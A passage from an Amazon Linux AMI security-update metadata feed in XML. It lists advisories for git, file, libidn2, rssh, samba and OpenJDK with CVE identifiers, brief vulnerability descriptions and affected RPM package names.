arch="x86_64"><filename>Packages/python34-devel-3.4.10-1.49.amzn1.x86_64.rpm</filename></package><package name="python34-libs" version="3.4.10" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-libs-3.4.10-1.49.amzn1.x86_64.rpm</filename></package><package name="python34-tools" version="3.4.10" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-tools-3.4.10-1.49.amzn1.x86_64.rpm</filename></package><package name="python34" version="3.4.10" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-3.4.10-1.49.amzn1.x86_64.rpm</filename></package><package name="python34-devel" version="3.4.10" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/python34-devel-3.4.10-1.49.amzn1.i686.rpm</filename></package><package name="python34-test" version="3.4.10" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/python34-test-3.4.10-1.49.amzn1.i686.rpm</filename></package><package name="python34" version="3.4.10" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/python34-3.4.10-1.49.amzn1.i686.rpm</filename></package><package name="python34-debuginfo" version="3.4.10" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/python34-debuginfo-3.4.10-1.49.amzn1.i686.rpm</filename></package><package name="python34-libs" version="3.4.10" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/python34-libs-3.4.10-1.49.amzn1.i686.rpm</filename></package><package name="python34-tools" version="3.4.10" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/python34-tools-3.4.10-1.49.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1325</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1325: important priority package update for git</title><issued date="2019-12-09 22:06:00" /><updated date="2019-12-11 05:55:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-1387:
99999:
CVE-2019-1354:
99999:
CVE-2019-1353:
99999:
CVE-2019-1352:
99999:
CVE-2019-1351:
99999:
CVE-2019-1350:
99999:
CVE-2019-1349:
99999:
CVE-2019-1348:
99999:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1348" title="" id="CVE-2019-1348" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1349" title="" id="CVE-2019-1349" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1350" title="" id="CVE-2019-1350" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1351" title="" id="CVE-2019-1351" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1352" title="" id="CVE-2019-1352" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1353" title="" id="CVE-2019-1353" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1354" title="" id="CVE-2019-1354" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1387" title="" id="CVE-2019-1387" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="git-svn" version="2.14.6" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-svn-2.14.6-1.61.amzn1.x86_64.rpm</filename></package><package name="perl-Git" version="2.14.6" release="1.61.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-2.14.6-1.61.amzn1.noarch.rpm</filename></package><package name="git-bzr" version="2.14.6" release="1.61.amzn1" epoch="0" arch="noarch"><filename>Packages/git-bzr-2.14.6-1.61.amzn1.noarch.rpm</filename></package><package name="git-email" version="2.14.6" release="1.61.amzn1" epoch="0" arch="noarch"><filename>Packages/git-email-2.14.6-1.61.amzn1.noarch.rpm</filename></package><package name="emacs-git-el" version="2.14.6" release="1.61.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-el-2.14.6-1.61.amzn1.noarch.rpm</filename></package><package name="perl-Git-SVN" version="2.14.6" release="1.61.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-SVN-2.14.6-1.61.amzn1.noarch.rpm</filename></package><package name="git-p4" version="2.14.6" release="1.61.amzn1" epoch="0" arch="noarch"><filename>Packages/git-p4-2.14.6-1.61.amzn1.noarch.rpm</filename></package><package name="git-daemon" version="2.14.6" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-daemon-2.14.6-1.61.amzn1.x86_64.rpm</filename></package><package name="git-all" version="2.14.6" release="1.61.amzn1" epoch="0" arch="noarch"><filename>Packages/git-all-2.14.6-1.61.amzn1.noarch.rpm</filename></package><package name="git-hg" version="2.14.6" release="1.61.amzn1" epoch="0" arch="noarch"><filename>Packages/git-hg-2.14.6-1.61.amzn1.noarch.rpm</filename></package><package name="git-debuginfo" version="2.14.6" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-debuginfo-2.14.6-1.61.amzn1.x86_64.rpm</filename></package><package name="emacs-git" version="2.14.6" release="1.61.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-2.14.6-1.61.amzn1.noarch.rpm</filename></package><package name="git" version="2.14.6" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-2.14.6-1.61.amzn1.x86_64.rpm</filename></package><package name="gitweb" version="2.14.6" release="1.61.amzn1" epoch="0" arch="noarch"><filename>Packages/gitweb-2.14.6-1.61.amzn1.noarch.rpm</filename></package><package name="git-cvs" version="2.14.6" release="1.61.amzn1" epoch="0" arch="noarch"><filename>Packages/git-cvs-2.14.6-1.61.amzn1.noarch.rpm</filename></package><package name="git-daemon" version="2.14.6" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/git-daemon-2.14.6-1.61.amzn1.i686.rpm</filename></package><package name="git-debuginfo" version="2.14.6" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/git-debuginfo-2.14.6-1.61.amzn1.i686.rpm</filename></package><package name="git" version="2.14.6" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/git-2.14.6-1.61.amzn1.i686.rpm</filename></package><package name="git-svn" version="2.14.6" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/git-svn-2.14.6-1.61.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1326</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1326: medium priority package update for file</title><issued date="2019-12-13 21:12:00" /><updated date="2019-12-19 18:14:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-18218:
cdf_read_property_info in cdf.c in file through 5.37 does not restrict the number of CDF_VECTOR elements, which allows a heap-based buffer overflow (4-byte out-of-bounds write).
99999:
CVE-2019-18218 file: heap-based buffer overflow in cdf_read_property_info in cdf.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18218" title="" id="CVE-2019-18218" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="file-libs" version="5.37" release="8.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-libs-5.37-8.48.amzn1.x86_64.rpm</filename></package><package name="python27-magic" version="5.37" release="8.48.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-magic-5.37-8.48.amzn1.noarch.rpm</filename></package><package name="file-static" version="5.37" release="8.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-static-5.37-8.48.amzn1.x86_64.rpm</filename></package><package name="python26-magic" version="5.37" release="8.48.amzn1" epoch="0" arch="noarch"><filename>Packages/python26-magic-5.37-8.48.amzn1.noarch.rpm</filename></package><package name="file-debuginfo" version="5.37" release="8.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-debuginfo-5.37-8.48.amzn1.x86_64.rpm</filename></package><package name="file" version="5.37" release="8.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-5.37-8.48.amzn1.x86_64.rpm</filename></package><package name="file-devel" version="5.37" release="8.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-devel-5.37-8.48.amzn1.x86_64.rpm</filename></package><package name="file-debuginfo" version="5.37" release="8.48.amzn1" epoch="0" arch="i686"><filename>Packages/file-debuginfo-5.37-8.48.amzn1.i686.rpm</filename></package><package name="file-devel" version="5.37" release="8.48.amzn1" epoch="0" arch="i686"><filename>Packages/file-devel-5.37-8.48.amzn1.i686.rpm</filename></package><package name="file-libs" version="5.37" release="8.48.amzn1" epoch="0" arch="i686"><filename>Packages/file-libs-5.37-8.48.amzn1.i686.rpm</filename></package><package name="file" version="5.37" release="8.48.amzn1" epoch="0" arch="i686"><filename>Packages/file-5.37-8.48.amzn1.i686.rpm</filename></package><package name="file-static" version="5.37" release="8.48.amzn1" epoch="0" arch="i686"><filename>Packages/file-static-5.37-8.48.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1327</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1327: medium priority package update for libidn2</title><issued date="2019-12-13 21:13:00" /><updated date="2019-12-19 23:34:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-18224:
idn2_to_ascii_4i in lib/lookup.c in GNU libidn2 before 2.1.1 has a heap-based buffer overflow via a long domain string.
99999:
CVE-2019-18224 libidn2: heap-based buffer overflow in idn2_to_ascii_4i in lib/lookup.c
CVE-2019-12290:
99999:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12290" title="" id="CVE-2019-12290" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18224" title="" id="CVE-2019-18224" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libidn2" version="2.3.0" release="1.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/libidn2-2.3.0-1.4.amzn1.x86_64.rpm</filename></package><package name="libidn2-debuginfo" version="2.3.0" release="1.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/libidn2-debuginfo-2.3.0-1.4.amzn1.x86_64.rpm</filename></package><package name="libidn2-devel" version="2.3.0" release="1.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/libidn2-devel-2.3.0-1.4.amzn1.x86_64.rpm</filename></package><package name="idn2" version="2.3.0" release="1.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/idn2-2.3.0-1.4.amzn1.x86_64.rpm</filename></package><package name="libidn2-devel" version="2.3.0" release="1.4.amzn1" epoch="0" arch="i686"><filename>Packages/libidn2-devel-2.3.0-1.4.amzn1.i686.rpm</filename></package><package name="libidn2-debuginfo" version="2.3.0" release="1.4.amzn1" epoch="0" arch="i686"><filename>Packages/libidn2-debuginfo-2.3.0-1.4.amzn1.i686.rpm</filename></package><package name="idn2" version="2.3.0" release="1.4.amzn1" epoch="0" arch="i686"><filename>Packages/idn2-2.3.0-1.4.amzn1.i686.rpm</filename></package><package name="libidn2" version="2.3.0" release="1.4.amzn1" epoch="0" arch="i686"><filename>Packages/libidn2-2.3.0-1.4.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1328</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1328: important priority package update for rssh</title><issued date="2019-12-13 21:17:00" /><updated date="2019-12-19 23:35:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-3464:
99999:
CVE-2019-3463:
99999:
CVE-2019-1000018:
99999:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1000018" title="" id="CVE-2019-1000018" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3463" title="" id="CVE-2019-3463" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3464" title="" id="CVE-2019-3464" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rssh-debuginfo" version="2.3.4" release="15.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/rssh-debuginfo-2.3.4-15.3.amzn1.x86_64.rpm</filename></package><package name="rssh" version="2.3.4" release="15.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/rssh-2.3.4-15.3.amzn1.x86_64.rpm</filename></package><package name="rssh" version="2.3.4" release="15.3.amzn1" epoch="0" arch="i686"><filename>Packages/rssh-2.3.4-15.3.amzn1.i686.rpm</filename></package><package name="rssh-debuginfo" version="2.3.4" release="15.3.amzn1" epoch="0" arch="i686"><filename>Packages/rssh-debuginfo-2.3.4-15.3.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1329</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1329: medium priority package update for samba</title><issued date="2019-12-13 21:18:00" /><updated date="2019-12-19 18:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-3880:
A flaw was found in the way samba implemented an RPC endpoint emulating the Windows registry service API. An unprivileged attacker could use this flaw to create a new registry hive file anywhere they have unix permissions which could lead to creation of a new file in the Samba share.
99999:
CVE-2019-3880 samba: save registry file outside share as unprivileged user
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3880" title="" id="CVE-2019-3880" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="samba-devel" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-devel-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="samba-common-tools" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-tools-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="samba" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="samba-winbind" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="samba-python-test" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-test-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="libwbclient-devel" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-devel-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="samba-common-libs" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-libs-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="libsmbclient-devel" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-devel-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="samba-libs" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-libs-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-clients" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-clients-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="ctdb" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-krb5-locator-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="samba-test" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="samba-debuginfo" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-debuginfo-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-modules" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-modules-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="libwbclient" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="libsmbclient" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="samba-client" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="ctdb-tests" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-tests-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="samba-python" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="samba-krb5-printing" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-krb5-printing-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="samba-pidl" version="4.9.1" release="6.46.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-pidl-4.9.1-6.46.amzn1.noarch.rpm</filename></package><package name="samba-client-libs" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-libs-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="samba-common" version="4.9.1" release="6.46.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-common-4.9.1-6.46.amzn1.noarch.rpm</filename></package><package name="samba-test-libs" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-libs-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-clients" version="4.9.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-clients-4.9.1-6.46.amzn1.i686.rpm</filename></package><package name="samba-test" version="4.9.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-4.9.1-6.46.amzn1.i686.rpm</filename></package><package name="samba-client" version="4.9.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-4.9.1-6.46.amzn1.i686.rpm</filename></package><package name="samba-python-test" version="4.9.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-test-4.9.1-6.46.amzn1.i686.rpm</filename></package><package name="samba-python" version="4.9.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-4.9.1-6.46.amzn1.i686.rpm</filename></package><package name="samba-devel" version="4.9.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/samba-devel-4.9.1-6.46.amzn1.i686.rpm</filename></package><package name="libwbclient-devel" version="4.9.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-devel-4.9.1-6.46.amzn1.i686.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.9.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-krb5-locator-4.9.1-6.46.amzn1.i686.rpm</filename></package><package name="libwbclient" version="4.9.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-4.9.1-6.46.amzn1.i686.rpm</filename></package><package name="samba-winbind-modules" version="4.9.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-modules-4.9.1-6.46.amzn1.i686.rpm</filename></package><package name="samba" version="4.9.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/samba-4.9.1-6.46.amzn1.i686.rpm</filename></package><package name="samba-winbind" version="4.9.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-4.9.1-6.46.amzn1.i686.rpm</filename></package><package name="samba-common-tools" version="4.9.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-tools-4.9.1-6.46.amzn1.i686.rpm</filename></package><package name="samba-test-libs" version="4.9.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-libs-4.9.1-6.46.amzn1.i686.rpm</filename></package><package name="ctdb-tests" version="4.9.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-tests-4.9.1-6.46.amzn1.i686.rpm</filename></package><package name="samba-client-libs" version="4.9.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-libs-4.9.1-6.46.amzn1.i686.rpm</filename></package><package name="samba-common-libs" version="4.9.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-libs-4.9.1-6.46.amzn1.i686.rpm</filename></package><package name="samba-libs" version="4.9.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/samba-libs-4.9.1-6.46.amzn1.i686.rpm</filename></package><package name="ctdb" version="4.9.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-4.9.1-6.46.amzn1.i686.rpm</filename></package><package name="libsmbclient-devel" version="4.9.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-devel-4.9.1-6.46.amzn1.i686.rpm</filename></package><package name="samba-debuginfo" version="4.9.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/samba-debuginfo-4.9.1-6.46.amzn1.i686.rpm</filename></package><package name="libsmbclient" version="4.9.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-4.9.1-6.46.amzn1.i686.rpm</filename></package><package name="samba-krb5-printing" version="4.9.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/samba-krb5-printing-4.9.1-6.46.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1330</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1330: important priority package update for java-1.8.0-openjdk</title><issued date="2020-01-06 23:06:00" /><updated date="2020-01-09 18:21:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-2999:
Vulnerability in the Java SE product of Oracle Java SE (component: Javadoc). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE accessible data as well as unauthorized read access to a subset of Java SE accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 4.7 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N).
No description is available for this CVE.
99999:
CVE-2019-2999 OpenJDK: Insufficient filtering of HTML event attributes in Javadoc (Javadoc, 8226765)
1760992:
CVE-2019-2999 OpenJDK: Insufficient filtering of HTML event attributes in Javadoc (Javadoc, 8226765)
CVE-2019-2992:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: 2D). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
No description is available for this CVE.
99999:
CVE-2019-2992 OpenJDK: Excessive memory allocation in CMap when reading TrueType font (2D, 8225597)
1761146:
CVE-2019-2992 OpenJDK: Excessive memory allocation in CMap when reading TrueType font (2D, 8225597)
CVE-2019-2989:
Vulnerability in the Oracle GraalVM Enterprise Edition product of Oracle GraalVM (component: Java). The supported version that is affected is 19.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle GraalVM Enterprise Edition. While the vulnerability is in Oracle GraalVM Enterprise Edition, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle GraalVM Enterprise Edition accessible data. CVSS 3.0 Base Score 6.8 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N).
No description is available for this CVE.
99999:
CVE-2019-2989 OpenJDK: Incorrect handling of HTTP proxy responses in HttpURLConnection (Networking, 8225298)
1761601:
CVE-2019-2989 OpenJDK: Incorrect handling of HTTP proxy responses in HttpURLConnection (Networking, 8225298)
CVE-2019-2988:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: 2D). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
No description is available for this CVE.
99999:
CVE-2019-2988 OpenJDK: Integer overflow in bounds check in SunGraphics2D (2D, 8225292)
1760999:
CVE-2019-2988 OpenJDK: Integer overflow in bounds check in SunGraphics2D (2D, 8225292)
CVE-2019-2987:
Vulnerability in the Java SE product of Oracle Java SE (component: 2D). Supported versions that are affected are Java SE: 11.0.4 and 13. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
No description is available for this CVE.
99999:
CVE-2019-2987 OpenJDK: Missing glyph bitmap image dimension check in FreetypeFontScaler (2D, 8225286)
1761149:
CVE-2019-2987 OpenJDK: Missing glyph bitmap image dimension check in FreetypeFontScaler (2D, 8225286)
CVE-2019-2983:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
No description is available for this CVE.
99999:
CVE-2019-2983 OpenJDK: Unexpected exception thrown during Font object deserialization (Serialization, 8224915)
1761262:
CVE-2019-2983 OpenJDK: Unexpected exception thrown during Font object deserialization (Serialization, 8224915)
CVE-2019-2981:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: JAXP). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
No description is available for this CVE.
99999:
CVE-2019-2981 OpenJDK: Unexpected exception thrown by XPath processing crafted XPath expression (JAXP, 8224532)
1760980:
CVE-2019-2981 OpenJDK: Unexpected exception thrown by XPath processing crafted XPath expression (JAXP, 8224532)
CVE-2019-2978:
